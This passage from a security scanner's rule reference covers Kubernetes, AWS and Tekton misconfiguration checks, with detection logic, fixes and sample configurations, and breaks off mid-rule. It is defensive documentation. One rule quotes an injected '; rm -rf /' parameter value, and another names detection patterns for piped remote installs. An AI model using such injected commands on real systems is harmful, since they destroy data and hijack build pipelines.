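  - kind: ServiceAccount
    name: app-runner           # bound explicitly, not to default
    namespace: payments
```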
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Charts that intentionally re-use the default SA in single-tenant namespaces. Consider creating a named SA anyway. It keeps the audit log unambiguous about which workload made an API call.
Source: K8S-029 in the Kubernetes provider.
K8S-030: Workload schedules onto a control-plane node HIGH 🔧 fix
Evidences: AC-6 Least Privilege, CM-7 Least Functionality, SC-7 Boundary Protection.
How this is detected. Fires on a non-system workload whose spec.nodeSelector contains a control-plane role label, OR whose spec.tolerations carries an entry with a control-plane taint key. Either condition is sufficient to land the pod on the control plane (the toleration is what survives the node taint; the nodeSelector picks the node).
Recommendation. Drop the nodeSelector and tolerations entries that target node-role.kubernetes.io/control-plane (or the legacy master spelling) from non-system workloads. A pod scheduled on a control-plane node shares the kernel with the API server, etcd, and kubelet credentials; credential theft from any such pod yields cluster-wide takeover. Application workloads belong on dedicated worker nodes; system add-ons that legitimately need control-plane scheduling should run as a DaemonSet in kube-system.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Audit/log shippers and CNI agents in kube-system are exempt by namespace. A workload that legitimately needs to run on the control plane outside kube-system is rare enough to warrant an explicit .pipelinecheckignore rationale.
Source: K8S-030 in the Kubernetes provider.
K8S-031: Namespace missing PSA warn label LOW
Evidences: AC-6 Least Privilege, CM-6 Configuration Settings.
How this is detected. Pod Security Admission supports three modes: enforce (reject), audit (log to API audit), and warn (return a kubectl warning). K8S-023 covers enforce; this rule covers warn. The convention from upstream PSA docs is to set warn to the next-strictest tier above your current enforce so an upgrade from baseline to restricted is a predictable rollout, not a surprise.
Recommendation. Set metadata.labels.pod-security.kubernetes.io/warn on every Namespace, ideally one tier ahead of the enforce label (e.g. enforce: baseline + warn: restricted). The warn level surfaces violations as kubectl apply warnings without rejecting the resource, developers see what would break before an enforcement upgrade lands.
Known false positives.
- Single-tenant clusters may set warn and audit globally via the AdmissionConfiguration defaults: block instead of per-namespace labels. The label-based check can't see that.
Source: K8S-031 in the Kubernetes provider.
K8S-032: Namespace lacks default-deny NetworkPolicy MEDIUM
Evidences: AC-3 Access Enforcement, SC-7 Boundary Protection.
How this is detected. Kubernetes' default network model is allow-everything: without any NetworkPolicy targeting a namespace, every pod can talk to every other pod across every namespace, and every pod can reach the internet. A default-deny policy flips the default to deny, so the only flows that work are those an explicit allow policy permits. The check fires on namespaces declared in the manifest set that have at least one workload but no default-deny NetworkPolicy covering them. Cross-doc correlation: it walks the full manifest stream to match Namespace/workload/NetworkPolicy across files.
Recommendation. Apply a default-deny NetworkPolicy in every namespace that carries workloads. The canonical shape is podSelector: {} (matches every pod) plus policyTypes: [Ingress, Egress] with no ingress: / egress: rules; every flow is then denied unless a more permissive NetworkPolicy in the same namespace explicitly allows it. Pair with per-workload allow-list policies for the flows the application actually needs.
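The canonical shape, with the namespace name illustrative:

```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: payments
spec:
  podSelector: {}              # every pod in the namespace
  policyTypes: [Ingress, Egress]
  # no ingress:/egress: rules: all flows denied until an allow policy permits them
```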
Known false positives.
- Mesh-managed clusters (Istio, Linkerd, Cilium ClusterMesh) often delegate L4 default-deny to the mesh's authorization policy. The check only looks at native NetworkPolicy and won't see that.
- kube-system / kube-public / kube-node-lease are exempt; control-plane components frequently need open networking and have their own admission-time guards.
Source: K8S-032 in the Kubernetes provider.
K8S-033: Namespace lacks ResourceQuota or LimitRange MEDIUM
Evidences: CM-6 Configuration Settings, SI-2 Flaw Remediation.
How this is detected. Without a ResourceQuota, a single namespace can consume the cluster's entire scheduling capacity: a fork bomb in a CronJob, a memory leak in a Deployment, or a cryptominer that landed via a fork-PR build can starve every other tenant. Without a LimitRange, individual pods without explicit resources: requests default to zero; the scheduler treats them as best-effort and packs them onto any node, including ones already at memory pressure. The two work together: quota caps the aggregate, range caps the per-workload baseline. Cross-doc correlation: walks the manifest stream to match Namespace / workload / ResourceQuota / LimitRange across files.
Recommendation. Apply a ResourceQuota and a LimitRange to every namespace that hosts application workloads. ResourceQuota caps the namespace's total CPU / memory / pod / object consumption; LimitRange enforces per-pod request / limit defaults so a workload that forgets to declare its own doesn't get unbounded scheduling. Together they bound the blast radius of a runaway, leaky, or attacker-driven pod explosion to a single namespace.
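A sketch of the pair, with all figures illustrative and to be sized per tenant:

```yaml
apiVersion: v1
kind: ResourceQuota
metadata:
  name: payments-quota
  namespace: payments
spec:
  hard:
    requests.cpu: "8"
    requests.memory: 16Gi
    limits.cpu: "16"
    limits.memory: 32Gi
    pods: "40"
---
apiVersion: v1
kind: LimitRange
metadata:
  name: payments-defaults
  namespace: payments
spec:
  limits:
    - type: Container
      default:                 # limit applied when a container declares none
        cpu: "1"
        memory: 512Mi
      defaultRequest:          # request applied when a container declares none
        cpu: 100m
        memory: 128Mi
```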
Source: K8S-033 in the Kubernetes provider.
K8S-034: ServiceAccount automountServiceAccountToken not explicitly false MEDIUM
Evidences: AC-2 Account Management, AC-6 Least Privilege.
How this is detected. K8S-012 covers the pod-level automountServiceAccountToken setting; this rule covers the same control at the ServiceAccount level. The two are complementary: the SA-level default flips the cluster-wide baseline (true -> false), the pod-level override re-enables only where needed. Without the SA-level disable, every pod that doesn't set its own override mounts a token that can call the K8s API as that SA, a useful credential for an attacker who lands code in any pod, regardless of the workload's own intent.
Recommendation. Set automountServiceAccountToken: false at the ServiceAccount level for every SA that doesn't actively need to call the Kubernetes API. The pods that legitimately do (operators, sidecars that read namespaces, controllers) can opt back in per-pod via spec.automountServiceAccountToken: true. The default is mount-everywhere, which is the wrong direction for least privilege.
Known false positives.
- Operator / controller workloads (cert-manager, metrics-server, ingress controllers) legitimately need API access from every pod. Their dedicated SAs should keep automount enabled; leave them out of the cluster-wide disable.
- The default SA in every namespace is the high-fire case worth disabling.
Source: K8S-034 in the Kubernetes provider.
K8S-035: Container securityContext.runAsUser is 0 HIGH
Evidences: AC-6 Least Privilege, CM-6 Configuration Settings.
How this is detected. K8S-007 covers runAsNonRoot: false (the boolean form). This rule covers the explicit numeric form: a container that sets runAsUser: 0 runs as root regardless of runAsNonRoot being declared elsewhere. Kubernetes won't reject the spec; it just runs the container as root. The two rules are paired so neither shape slips through alone. The pod-level securityContext.runAsUser inherits to every container that doesn't override it; this rule fires on the effective UID, walking pod-level first then per-container override.
Recommendation. Set securityContext.runAsUser to a non-zero UID (e.g. 1000 or any application-specific value) on every workload container. The corresponding runAsGroup and fsGroup should also be non-zero. Root inside a container is not isolation: a kernel CVE, a misconfigured mount, or a mis-applied capability collapses straight into the host.
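A minimal pod-spec fragment (UIDs illustrative):

```yaml
spec:
  securityContext:             # pod-level; inherited by every container
    runAsUser: 1000
    runAsGroup: 1000
    fsGroup: 1000
    runAsNonRoot: true         # pairs with K8S-007
```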
Source: K8S-035 in the Kubernetes provider.
K8S-036: ServiceAccount imagePullSecrets references missing Secret MEDIUM
Evidences: SI-7 Software, Firmware, and Information Integrity, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Cross-doc correlation: walks every ServiceAccount's imagePullSecrets and confirms the named Secret exists in the same namespace within the manifest set. Misses two cases: secrets created out-of-band (Sealed Secrets, External Secrets, or operator-applied ones) and SAs whose namespace is implicit / not declared in the manifest set. For those, the rule passes; it is deliberately false-negative-friendly.
Recommendation. Create the missing Kind: Secret of type: kubernetes.io/dockerconfigjson (or dockercfg) in the same namespace before applying the ServiceAccount, or fix the imagePullSecrets reference name. A dangling reference doesn't fail apply; kubelet silently falls back to anonymous registry pulls on every image fetch. Workloads either pull a different image than the operator intended or fail at runtime with ImagePullBackOff after the registry rate-limits the unauthenticated client.
Known false positives.
- Manifests rendered for partial deployment where the secret lives in a parallel manifest set the scanner doesn't see (separate ArgoCD application, Vault-injected, ESO-synced). Add # pipeline-check: ignore K8S-036 or ignore the specific SA name to silence.
Source: K8S-036 in the Kubernetes provider.
K8S-037: ConfigMap data carries a credential-shaped literal HIGH
Evidences: IA-5 Authenticator Management, SC-28 Protection of Information at Rest.
How this is detected. Companion to K8S-018 (which scans Kind: Secret). Walks ConfigMap data and binaryData for AKIA-shaped AWS keys and credential-shaped key NAMES. Even when the value is a placeholder, having api_key: REPLACE_ME in a ConfigMap is a maintenance footgun: someone will fill it in and commit. RBAC scoping for configmaps is typically much broader than secrets, so any credential leak via this path reaches a wider audience.
Recommendation. Move the value out of the ConfigMap. Secrets belong in Kind: Secret (better: SealedSecrets, ExternalSecrets / ESO, SOPS-encrypted manifests, or HashiCorp Vault Agent injection). ConfigMaps are intended for non-sensitive config and are mounted into pods without the access controls Secrets carry; the RoleBinding for configmaps:get is typically far broader than the one for secrets:get. A credential in a ConfigMap is effectively unprotected once any pod can read the namespace's config.
Known false positives.
- ConfigMaps that legitimately carry placeholder names (DEBUG_TOKEN_FORMAT, LICENSE_KEY_HEADER) where the VALUE is a format hint rather than a credential. Rename the key to avoid the credential-shaped name.
Source: K8S-037 in the Kubernetes provider.
K8S-038: NetworkPolicy ingress / egress allows all sources or destinations MEDIUM
Evidences: AC-3 Access Enforcement, SC-7 Boundary Protection.
How this is detected. K8S-032 covers the absence of a default-deny NetworkPolicy. This rule covers the inverse: a NetworkPolicy that exists but contains an ingress: rule with no from: (allow from all) or no ports: filter, or an egress: rule with no to: filter. The from: [] / to: [] shorthand is the canonical mistake. A rule that lists specific peers via podSelector / namespaceSelector / ipBlock passes.
Recommendation. Replace the empty from: [] / to: [] rule with an explicit from: [{podSelector: {matchLabels: {…}}}] or from: [{namespaceSelector: {matchLabels: {…}}}] that names the legitimate peer. An empty from / to peers list means every source / destination, every pod in every namespace, plus every external IP. This is indistinguishable from having no NetworkPolicy at all for the targeted pod, but visually appears to enforce a policy (the false-sense-of-security failure mode is worse than no policy).
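A sketch of the named-peer shape; the labels are illustrative, and kubernetes.io/metadata.name is the label Kubernetes sets automatically on every Namespace:

```yaml
ingress:
  - from:
      - namespaceSelector:
          matchLabels:
            kubernetes.io/metadata.name: frontend   # illustrative peer namespace
      - podSelector:
          matchLabels:
            app: api-gateway                        # illustrative peer pod
    ports:
      - protocol: TCP
        port: 8080
```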
Known false positives.
- Policies intentionally allowing world traffic to a public ingress controller pod ({app: nginx-ingress, public: true}). Add # pipeline-check: ignore K8S-038 on the specific NetworkPolicy if the wide-open shape is deliberate.
Source: K8S-038 in the Kubernetes provider.
K8S-039: Pod uses shareProcessNamespace: true MEDIUM
Evidences: AC-6 Least Privilege, CM-6 Configuration Settings.
How this is detected. shareProcessNamespace: true makes every container in the pod share a single PID namespace. Any container can then enumerate every other container's processes (ps), read their environment variables and CLI args from /proc/<pid>/, send them signals, and (with the right capabilities) ptrace them. A compromised sidecar (debug shell, logging agent, observability exporter) gets a free pivot into every primary container's secrets. The default is false; setting it explicitly to true is the failing shape.
Recommendation. Drop spec.shareProcessNamespace: true from the pod spec. Containers in the pod go back to having isolated PID namespaces: each sees only its own processes, can't ptrace neighbours, and can't read their /proc/<pid>/environ for env-var-leaked secrets. If the requirement is sidecar-style log collection or process-level cooperation, prefer a sidecar pattern that exchanges data through a shared volume rather than collapsing the namespace.
Known false positives.
- Debug pods that explicitly need ps / strace across container boundaries, but those are typically ephemeralContainers attached to a running pod, not long-lived pod specs in a manifest. If a permanent workload genuinely requires it, ignore the rule with a documented justification.
Source: K8S-039 in the Kubernetes provider.
K8S-040: Container securityContext.procMount: Unmasked HIGH
Evidences: AC-6 Least Privilege, CM-6 Configuration Settings.
How this is detected. procMount: Unmasked is rarely needed in practice. It exists for nested-container / KubeVirt scenarios where the container itself runs an inner container runtime that needs to set up its own /proc masking. For an ordinary application container, Unmasked is a runtime-isolation regression that exposes kernel-information paths and writable /proc/sys entries to the workload. Pod Security Standards classify Unmasked as 'restricted'-violating; the rule fires when any container (containers, initContainers, ephemeralContainers) explicitly sets procMount: Unmasked.
Recommendation. Remove securityContext.procMount: Unmasked (or set it explicitly to Default). The default Default procMount type masks several kernel- and node-information paths under /proc (/proc/asound, /proc/acpi, /proc/kcore, /proc/keys, /proc/latency_stats, /proc/timer_list, /proc/timer_stats, /proc/sched_debug, /proc/scsi) and remounts /proc/sys as read-only. These maskings are what stop a container from reading the host's kernel structures or writing to /proc/sys and breaking the kernel out of namespace isolation. Unmasked undoes all of that.
Source: K8S-040 in the Kubernetes provider.
KMS-001: KMS customer-managed key has rotation disabled MEDIUM
Evidences: SC-12 Cryptographic Key Establishment and Management, SC-13 Cryptographic Protection.
How this is detected. Annual rotation regenerates the underlying key material for the same CMK ARN. Existing ciphertexts can still be decrypted (KMS keeps old material around), but new encrypts use the new material, so a cryptographic exposure (side-channel, an accidental export, an old compromised offline backup) only endangers ciphertexts produced before the rotation.
Recommendation. Enable annual rotation on every customer-managed KMS key used for CI/CD artifact, log, and secret encryption. Unrotated CMKs keep the same key material indefinitely, so a single cryptographic exposure (side-channel, accidental export) is permanent.
Source: KMS-001 in the AWS provider.
KMS-002: KMS key policy grants wildcard KMS actions HIGH
Evidences: AC-3 Access Enforcement, AC-6 Least Privilege.
How this is detected. kms:* on a key policy is administrative authority over the cipher boundary: CancelKeyDeletion, ScheduleKeyDeletion, ReEncrypt, UpdateKeyDescription, and the data-plane decrypt actions all collapse into one grant. A CI/CD principal almost never needs more than the data-plane subset (Decrypt / GenerateDataKey / Encrypt).
Recommendation. Replace kms:* grants with specific actions needed by the caller (e.g. kms:Decrypt, kms:GenerateDataKey). Key-policy wildcard grants let any holder of the principal re-key, schedule deletion, or export material at will.
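A sketch of the scoped statement shape; the account ID and role name are illustrative, and Resource: "*" inside a key policy refers to the key the policy is attached to:

```json
{
  "Sid": "CiDataPlaneOnly",
  "Effect": "Allow",
  "Principal": {"AWS": "arn:aws:iam::111122223333:role/ci-build"},
  "Action": [
    "kms:Decrypt",
    "kms:Encrypt",
    "kms:GenerateDataKey*"
  ],
  "Resource": "*"
}
```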
Source: KMS-002 in the AWS provider.
LMB-001: Lambda function has no code-signing config HIGH
Evidences: SI-7 Software, Firmware, and Information Integrity, SR-4 Provenance.
How this is detected. Lambda code-signing config + a Signer profile (SIGN-001) validates that an uploaded zip was signed by a known profile before it's allowed to run. Without one, anyone who reaches lambda:UpdateFunctionCode (through a CI/CD role compromise or a misattached IAM policy) can replace the function's code with no chain-of-custody check.
Recommendation. Create an AWS Signer profile, reference it from an aws_lambda_code_signing_config with untrusted_artifact_on_deployment = Enforce and attach that config to the function. Without one, the Lambda runtime will execute any code that a principal with lambda:UpdateFunctionCode uploads.
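A Terraform sketch of the wiring, assuming an existing aws_iam_role.lambda and with the remaining function config elided:

```hcl
resource "aws_signer_signing_profile" "release" {
  platform_id = "AWSLambda-SHA384-ECDSA"   # the Lambda signing platform (SIGN-001)
  name_prefix = "release"
}

resource "aws_lambda_code_signing_config" "enforce" {
  allowed_publishers {
    signing_profile_version_arns = [aws_signer_signing_profile.release.version_arn]
  }
  policies {
    untrusted_artifact_on_deployment = "Enforce"   # reject unsigned uploads outright
  }
}

resource "aws_lambda_function" "app" {
  function_name           = "app"                  # remaining config elided
  role                    = aws_iam_role.lambda.arn
  code_signing_config_arn = aws_lambda_code_signing_config.enforce.arn
}
```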
Source: LMB-001 in the AWS provider.
LMB-002: Lambda function URL has AuthType=NONE HIGH
Evidences: AC-3 Access Enforcement.
How this is detected. A Lambda function URL with AuthType=NONE is a public HTTPS endpoint: anyone who knows the URL can invoke it. This is sometimes deliberate (a webhook receiver), but the deliberate version typically signs / validates inside the function; the rule fires regardless because the IAM-side control isn't there.
Recommendation. Set the function URL auth_type to AWS_IAM and grant lambda:InvokeFunctionUrl through IAM. NONE exposes the function to the public internet without authentication.
Source: LMB-002 in the AWS provider.
LMB-003: Lambda function env vars may contain plaintext secrets HIGH
Evidences: IA-5 Authenticator Management.
How this is detected. Lambda env vars are world-readable to any principal with lambda:GetFunctionConfiguration, a much wider set than the principals allowed to invoke the function. They also persist in CloudFormation drift, change-sets, and CloudTrail events. A secret in a Lambda env var is essentially exposed to anyone with read access to the account.
Recommendation. Move secrets out of Lambda environment variables and into Secrets Manager or SSM Parameter Store. Environment variables are visible to anyone with lambda:GetFunctionConfiguration and persist in CloudTrail events, which keeps the secret in audit logs.
Source: LMB-003 in the AWS provider.
LMB-004: Lambda resource policy allows wildcard principal CRITICAL
Evidences: AC-3 Access Enforcement, SC-7 Boundary Protection.
How this is detected. A wildcard-principal Allow on a Lambda function resource policy lets anyone invoke the function. The legitimate case is a service principal (API Gateway, S3 events) where AWS fills in the SourceArn / SourceAccount at invoke time; without those conditions, any account using that service can invoke.
Recommendation. Remove Allow statements with Principal: '*' from every Lambda function resource policy, or scope them with a SourceArn / SourceAccount condition. Service principals (e.g. apigateway.amazonaws.com) are the common legitimate case; ensure they carry a condition.
Source: LMB-004 in the AWS provider.
PBAC-001: CodeBuild project has no VPC configuration HIGH
Evidences: SC-7 Boundary Protection.
How this is detected. A CodeBuild project with no VPC configuration runs in AWS-managed network space, where egress to the public internet is unrestricted and every package registry, CDN, or arbitrary endpoint is reachable. Inside a VPC, security-group and VPC-endpoint policies become the egress gate, which is the only practical way to limit a compromised build's exfiltration paths.
Recommendation. Configure the CodeBuild project to run inside a VPC with appropriate subnets and security groups. Use a NAT gateway or VPC endpoints to control outbound internet access and restrict build nodes to only the network resources they require.
Source: PBAC-001 in the AWS provider.
PBAC-002: CodeBuild service role shared across multiple projects MEDIUM
Evidences: AC-2 Account Management, AC-6 Least Privilege.
How this is detected. One CodeBuild service role across many projects means a compromise of any project's build environment grants access to whatever resources every other project's build needs. Per-project roles cap the radius: a backdoor in the foo-tests build can't reach the deploy-prod build's secrets if they each have their own role.
Recommendation. Create a dedicated IAM service role for each CodeBuild project, scoped to only the permissions that specific project requires. This limits the blast radius if one project's build is compromised.
Source: PBAC-002 in the AWS provider.
S3-001: Artifact bucket public access block not fully enabled CRITICAL
Evidences: AC-3 Access Enforcement, AU-9 Protection of Audit Information, SC-7 Boundary Protection.
How this is detected. S3 Block Public Access is the bucket-level circuit breaker that supersedes any future ACL or bucket-policy edit. Without all four settings enabled, a misconfigured CloudFormation change or a stray aws s3api call can re-expose the bucket to the public, even if the bucket had previously been private.
Recommendation. Enable all four S3 Block Public Access settings on the artifact bucket: BlockPublicAcls, IgnorePublicAcls, BlockPublicPolicy, and RestrictPublicBuckets.
Source: S3-001 in the AWS provider.
S3-002: Artifact bucket server-side encryption not configured HIGH
Evidences: AU-9 Protection of Audit Information, SC-12 Cryptographic Key Establishment and Management, SC-13 Cryptographic Protection, SC-28 Protection of Information at Rest.
How this is detected. Default bucket encryption applies SSE-S3 (AES256) to every PutObject. As of January 2023, AWS enables this on all new buckets automatically, but existing buckets created before then can still be unencrypted unless explicitly configured. Without it, individual objects can be uploaded without encryption (the client gets to choose).
Recommendation. Enable default bucket encryption using at minimum AES256 (SSE-S3). For stronger key control, use SSE-KMS with a customer-managed key.
Source: S3-002 in the AWS provider.
S3-003: Artifact bucket versioning not enabled MEDIUM
Evidences: AU-9 Protection of Audit Information, SI-7 Software, Firmware, and Information Integrity.
How this is detected. Versioning makes overwrites and deletes recoverable: the previous content of an object survives until lifecycle expires it. Without versioning, an artifact overwrite (a bad pipeline run, a malicious replacement, a typo'd aws s3 cp) is unrecoverable; the original bytes are gone.
Recommendation. Enable S3 versioning on the artifact bucket so that previous artifact versions are retained and rollback is possible. Combine with a lifecycle rule to expire old versions after a retention period.
Source: S3-003 in the AWS provider.
S3-004: Artifact bucket access logging not enabled LOW
Evidences: AU-2 Event Logging, AU-12 Audit Record Generation.
How this is detected. S3 server access logging records every API operation against the bucket, who, when, what object, what method. CloudTrail data events overlap but cost more; access logs are the cheap baseline. Without them, an exfiltration via GetObject doesn't leave a trail you can investigate.
Recommendation. Enable S3 server access logging for the artifact bucket and direct logs to a separate, centralized logging bucket with restricted write access.
Source: S3-004 in the AWS provider.
S3-005: Artifact bucket missing aws:SecureTransport deny MEDIUM
Evidences: AU-9 Protection of Audit Information, SC-8 Transmission Confidentiality and Integrity.
How this is detected. S3 endpoints accept HTTP and HTTPS by default. Without an explicit Deny on aws:SecureTransport=false, a plaintext request, typically from a misconfigured client or an SDK with a stale endpoint, is honored if signed. The bucket policy Deny is the only enforcement; no account-level switch covers it.
Recommendation. Add a Deny statement for s3:* with Bool aws:SecureTransport=false.
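A sketch of the bucket-policy statement, with the bucket name illustrative:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenyInsecureTransport",
      "Effect": "Deny",
      "Principal": "*",
      "Action": "s3:*",
      "Resource": [
        "arn:aws:s3:::example-artifact-bucket",
        "arn:aws:s3:::example-artifact-bucket/*"
      ],
      "Condition": {"Bool": {"aws:SecureTransport": "false"}}
    }
  ]
}
```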
Source: S3-005 in the AWS provider.
SIGN-001: No AWS Signer profile defined for Lambda deploys MEDIUM
Evidences: SI-7 Software, Firmware, and Information Integrity, SR-4 Provenance.
How this is detected. AWS Signer profiles are the upstream of LMB-001's code-signing config. Without a profile defined, no function in the account can enforce code-signing; LMB-001's recommendation has nothing to point at. The profile is the foundation; the per-function code-signing config attaches it.
Recommendation. Create an AWS Signer profile with platform AWSLambda-SHA384-ECDSA and reference it from every Lambda code-signing config used by the pipeline. Without a profile, LMB-001 remediation isn't possible and release artifacts can't be signed at build time.
Source: SIGN-001 in the AWS provider.
SIGN-002: AWS Signer profile is revoked or inactive HIGH
Evidences: SI-7 Software, Firmware, and Information Integrity, SR-4 Provenance.
How this is detected. A revoked or canceled Signer profile invalidates every signature it ever produced. Lambda functions configured to enforce code-signing fail to deploy until the profile is replaced (or, if UntrustedArtifactOnDeployment = Warn, deploy with a CloudWatch warning the operator rarely reads).
Recommendation. Rotate the signing profile: create a replacement and update every code-signing config that references the revoked profile. A revoked or canceled profile invalidates every signature it produced; Lambdas relying on it will fail verification.
Source: SIGN-002 in the AWS provider.
SM-001: Secrets Manager secret has no rotation configured HIGH
Evidences: IA-5 Authenticator Management, SC-12 Cryptographic Key Establishment and Management.
How this is detected. Only secrets actually referenced by CodeBuild are checked; secrets used purely by application workloads are out of scope for a CI/CD scanner.
Recommendation. Enable automatic rotation on every Secrets Manager secret referenced by a CodeBuild project or CodePipeline. Unrotated secrets persist indefinitely, so a single leak (e.g. a build log that echoed the value) compromises the secret for its full lifetime.
Source: SM-001 in the AWS provider.
SM-002: Secrets Manager resource policy allows wildcard principal CRITICAL
Evidences: AC-3 Access Enforcement, SC-7 Boundary Protection.
How this is detected. A wildcard-principal Allow on a Secrets Manager resource policy means any principal in any AWS account can call GetSecretValue (subject to conditions, if any). Always combine with at least aws:SourceAccount or aws:PrincipalOrgID; the lift-and-shift cross-account secret-access pattern needs scoping.
Recommendation. Remove Allow statements whose Principal is * from every Secrets Manager resource policy, or scope them with a Condition restricting the source account/org (aws:PrincipalOrgID). A wildcard-principal policy allows any AWS account to call GetSecretValue on the secret.
Source: SM-002 in the AWS provider.
SSM-001: SSM Parameter with secret-like name is not a SecureString HIGH
Evidences: IA-5 Authenticator Management.
How this is detected. An SSM String parameter is plaintext at rest and over the API; ssm:GetParameter without any KMS Decrypt authority returns the value. SecureString adds KMS encryption plus the WithDecryption=true flag (which forces an explicit KMS authorization step). Secret-named parameters (TOKEN, PASSWORD, KEY) are almost always intended to be SecureString; exceptions are rare.
Recommendation. Recreate the parameter with Type=SecureString and migrate consumers to the new name if needed. Plain String parameters are visible via ssm:GetParameter without any KMS authorization.
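A CLI sketch of the migration; the parameter name, key alias, and token file are illustrative:

```sh
# Create the SecureString replacement under a customer-managed key (see SSM-002):
aws ssm put-parameter \
  --name /ci/github-token \
  --type SecureString \
  --key-id alias/ci-secrets \
  --value "$(cat token.txt)"

# Consumers must now opt in to decryption (an auditable KMS call):
aws ssm get-parameter --name /ci/github-token --with-decryption
```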
Source: SSM-001 in the AWS provider.
SSM-002: SSM SecureString uses the default AWS-managed key MEDIUM
Evidences: SC-12 Cryptographic Key Establishment and Management, SC-13 Cryptographic Protection.
How this is detected. alias/aws/ssm is the AWS-managed default for SecureString. Its key policy is fixed and account-wide. A customer-managed key gives you the same per-parameter key-policy and CloudTrail audit story you'd get from Secrets Manager configured with a customer-managed key.
Recommendation. Recreate SecureString parameters with KeyId pointing at a customer-managed KMS key. The default alias/aws/ssm key is shared across the account and its key policy cannot be audited or scoped per parameter.
Source: SSM-002 in the AWS provider.
TKN-001: Tekton step image not pinned to a digest HIGH
Evidences: SI-2 Flaw Remediation, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Applies to Task and ClusterTask kinds. The image must contain @sha256: followed by a 64-char hex digest. Any tag-only reference, including :latest, fails.
Recommendation. Pin every step image to a content-addressable digest (gcr.io/tekton-releases/git-init@sha256:<digest>). Tag-only references (alpine:3.18) and rolling tags (alpine:latest) let a compromised registry (or a re-pushed tag) redirect the step image at the next pull, with no audit trail in the Task manifest.
Source: TKN-001 in the Tekton provider.
TKN-002: Tekton step runs privileged or as root HIGH
Evidences: AC-6 Least Privilege, CM-7 Least Functionality.
How this is detected. Detection fires on a step with securityContext.privileged: true, securityContext.runAsUser: 0, securityContext.runAsNonRoot: false, securityContext.allowPrivilegeEscalation: true, or no securityContext block at all.
Recommendation. Set securityContext.privileged: false, runAsNonRoot: true, and allowPrivilegeEscalation: false on every step. A privileged step shares the node's kernel namespaces; a malicious or compromised step image then has root on the build node, breaking the boundary between build and cluster.
Source: TKN-002 in the Tekton provider.
TKN-003: Tekton param interpolated unsafely in step script CRITICAL
Evidences: CM-6 Configuration Settings, SA-11 Developer Testing and Evaluation.
How this is detected. Fires on any $(params.X) or $(workspaces.X.path) token inside a script: body that isn't already wrapped in double quotes ("$(params.X)"). Doesn't fire on the env-var indirection pattern, which is safe.
Recommendation. Don't interpolate $(params.<name>) directly into the step script:. Tekton substitutes the value before the shell parses it, so a parameter containing ; rm -rf / runs as shell. Receive the parameter through env: (valueFrom: ... or value: $(params.<name>)) and reference the env var quoted in the script ("$NAME"); or pass it as a positional argument to a shell function.
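A sketch of the safe env-indirection shape; the step name, param name, and image are illustrative:

```yaml
steps:
  - name: greet
    image: alpine@sha256:<digest>        # pinned per TKN-001
    env:
      - name: USER_NAME
        value: $(params.username)        # Tekton substitutes here, not in the script
    script: |
      #!/bin/sh
      echo "hello, $USER_NAME"           # quoted env reference; never $(params.*)
```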
Source: TKN-003 in the Tekton provider.
TKN-004: Tekton Task mounts hostPath or shares host namespaces CRITICAL
Evidences: AC-6 Least Privilege, SC-7 Boundary Protection, SI-7 Software, Firmware, and Information Integrity.
How this is detected. Checks spec.volumes[].hostPath (legacy v1beta1 form), spec.workspaces[].volumeClaimTemplate.spec.storageClassName == 'hostpath', and spec.podTemplate host-namespace flags.
Recommendation. Use Tekton workspaces: backed by emptyDir or persistentVolumeClaim instead of hostPath. Drop hostNetwork: true / hostPID: true / hostIPC: true on the Task's podTemplate. A hostPath mount of /var/run/docker.sock or / lets the build break out of the pod and act as the underlying node.
Source: TKN-004 in the Tekton provider.
TKN-005: Literal secret value in Tekton step env or param default CRITICAL 🔧 fix
Evidences: IA-5 Authenticator Management, SC-28 Protection of Information at Rest.
How this is detected. Strong matches: AWS access keys, GitHub PATs, JWTs. Weak match: env var name suggests a secret (*_TOKEN, *_KEY, *PASSWORD, *SECRET) and the value is a non-empty literal rather than a $(params.X) / valueFrom reference.
Recommendation. Mount secrets via env.valueFrom.secretKeyRef (or a volumes: Secret mount) instead of writing the value into env.value or params[].default. Task manifests are committed to git and cluster-readable; literal values leak through normal access paths.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: TKN-005 in the Tekton provider.
TKN-006: Tekton run lacks an explicit timeout LOW
Evidences: AU-2 Event Logging, SI-2 Flaw Remediation.
How this is detected. Applies to PipelineRun, TaskRun, and Pipeline. For Pipelines, the rule looks for spec.tasks[].timeout as evidence of intent. Task / ClusterTask themselves don't carry a timeout; the timeout lives on the concrete run.
Recommendation. Set spec.timeouts.pipeline (or spec.timeout on a TaskRun) on every PipelineRun and TaskRun. A misbehaving step otherwise pins a build pod for the cluster's default timeout (1h). For long jobs, set a generous explicit value (2h, 6h) rather than leaving it implicit.
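A minimal PipelineRun sketch (names and durations illustrative):

```yaml
apiVersion: tekton.dev/v1
kind: PipelineRun
metadata:
  name: build-run
spec:
  pipelineRef:
    name: build                # illustrative Pipeline
  timeouts:
    pipeline: "2h"             # budget for the whole run
    tasks: "1h30m"             # optional: cap the tasks phase separately
```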
Source: TKN-006 in the Tekton provider.
TKN-007: Tekton run uses the default ServiceAccount MEDIUM
Evidences: AC-2 Account Management, AC-6 Least Privilege.
How this is detected. An explicit serviceAccountName: default setting is treated the same as omission.
Recommendation. Set spec.serviceAccountName on every TaskRun and PipelineRun to a least-privilege ServiceAccount that carries only the secrets and RBAC the run actually needs. Falling back to the namespace's default SA grants access to whatever cluster-admin or wildcard role someone later binds to default, a privilege-escalation surface that should never be load-bearing for build pods.
Source: TKN-007 in the Tekton provider.
TKN-008: Tekton step script pipes remote install or disables TLS HIGH 🔧 fix
Evidences: SC-8 Transmission Confidentiality and Integrity, SI-7 Software, Firmware, and Information Integrity, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Uses the cross-provider CURL_PIPE_RE and TLS_BYPASS_RE regexes so detection is consistent with the GHA / GitLab / CircleCI / Cloud Build providers.
